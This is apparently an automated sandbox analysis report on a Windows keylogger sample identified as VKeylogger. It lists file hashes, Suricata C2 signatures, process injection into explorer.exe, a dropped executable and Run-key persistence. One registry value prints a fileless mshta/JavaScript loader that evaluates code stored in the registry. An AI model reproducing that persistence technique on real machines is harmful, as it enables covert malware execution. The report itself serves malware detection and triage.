Analysis
-
max time kernel
143s -
max time network
162s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
21-02-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
Resource
win10v2004-en-20220112
General
-
Target
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
-
Size
74KB
-
MD5
ba4380237e7a0f220deaaada1fddff73
-
SHA1
394b852855574cffa26a66bec083792a21f87f79
-
SHA256
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965
-
SHA512
5e70426b3547020f93c62764f418ff7d475f4bf772130b056f33884e7b155b9675a4af292b356bd9897c5e6c665488989d7400dfb452d8544d1252b3e3798142
Malware Config
Signatures
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/320-58-0x0000000000080000-0x0000000000092000-memory.dmp family_vkeylogger -
suricata: ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)
suricata: ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)
-
suricata: ET MALWARE Generic Request to gate.php Dotted-Quad
suricata: ET MALWARE Generic Request to gate.php Dotted-Quad
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
suricata: ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity
suricata: ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
493.exepid process 1168 493.exe -
Loads dropped DLL 5 IoCs
Processes:
explorer.exepid process 320 explorer.exe 320 explorer.exe 320 explorer.exe 320 explorer.exe 320 explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\grerg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\yrty = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe493.exedescription pid process target process PID 268 set thread context of 320 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe explorer.exe PID 1168 set thread context of 1968 1168 493.exe ielowutil.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exeexplorer.exepid process 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe 320 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
explorer.exepid process 320 explorer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
explorer.exe493.exepid process 320 explorer.exe 1168 493.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exeexplorer.exe493.exedescription pid process target process PID 268 wrote to memory of 320 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe explorer.exe PID 268 wrote to memory of 320 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe explorer.exe PID 268 wrote to memory of 320 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe explorer.exe PID 268 wrote to memory of 320 268 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe explorer.exe PID 320 wrote to memory of 1168 320 explorer.exe 493.exe PID 320 wrote to memory of 1168 320 explorer.exe 493.exe PID 320 wrote to memory of 1168 320 explorer.exe 493.exe PID 320 wrote to memory of 1168 320 explorer.exe 493.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe PID 1168 wrote to memory of 1968 1168 493.exe ielowutil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe"C:\Users\Admin\AppData\Local\Temp\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\493.exe"C:\Users\Admin\AppData\Local\Temp\493.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
C:\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
\Users\Admin\AppData\Local\Temp\493.exeMD5
558063e08ac6993410949408a509a30f
SHA1d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA2565c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
memory/268-55-0x0000000076141000-0x0000000076143000-memory.dmpFilesize
8KB
-
memory/320-57-0x0000000074EE1000-0x0000000074EE3000-memory.dmpFilesize
8KB
-
memory/320-58-0x0000000000080000-0x0000000000092000-memory.dmpFilesize
72KB
-
memory/1968-69-0x0000000000400000-0x0000000000687000-memory.dmpFilesize
2.5MB